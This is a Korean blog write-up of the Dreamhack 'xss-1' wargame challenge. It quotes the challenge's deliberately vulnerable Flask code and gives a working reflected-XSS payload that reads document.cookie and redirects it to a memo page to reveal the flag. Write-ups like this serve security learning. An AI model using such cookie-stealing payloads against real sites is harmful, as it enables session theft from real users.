본문 바로가기
Wargame/Web

[Dreamhack] xss-1

l2chae 2024. 2. 11. 10:16

소스 코드 분석

/vuln
param 값을 전달 받아 그대로 출력한다

@app.route("/vuln")
def vuln():
    param = request.args.get("param", "")
    return param

/flag
param 값과 FLAG를 check_xss로 전달 후에 read_url 함수의 결과 값을 반환한다
read_url 함수에서 FLAG를 값으로 cookie를 생성한다

def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    try:
        service = Service(executable_path="/chromedriver")
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome(service=service, options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get("<http://127.0.0.1:8000/>")
        driver.add_cookie(cookie)
        driver.get(url)
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True

def check_xss(param, cookie={"name": "name", "value": "value"}):
    url = f"<http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}>"
    return read_url(url, cookie)

@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html")
    elif request.method == "POST":
        param = request.form.get("param")
        if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
            return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'

/memo
전달된 memo 값을 memo_txt 변수에 추가하여 저장 후, render_template 함수를 통해 출력한다

memo_text = ""

@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\\n"
    return render_template("memo.html", memo=memo_text)

 

취약점 분석

/vuln
param 값을 그대로 출력하므로 XSS 취약점이 발생한다
/flag에서 param 값을 받아 /vuln으로 전달하므로 이를 이용하여 생성된 cookie를 /memo로 전달하여 cookie값을 확인할 수 있다
 

익스플로잇

/vuln에서 /memo에 값 전달

location.href="<<a href=http://host3.dreamhack.games:19069/memo?memo=hi>http://host3.dreamhack.games:19069/memo?memo=hi</a>>";

FLAG 확인

<script>location.href="/memo?memo="+document.cookie;</script>

반응형

'Wargame > Web' 카테고리의 다른 글

[Dreamhack] csrf-1  (0) 2024.02.17
[Dreamhack] xss-2  (2) 2024.02.11
[Dreamhack] session-basic  (0) 2024.02.08
[Dreamhack] cookie  (0) 2024.02.08
[Dreamhack] devtools-sources  (0) 2024.02.04

'Wargame/Web' Related Articles

티스토리툴바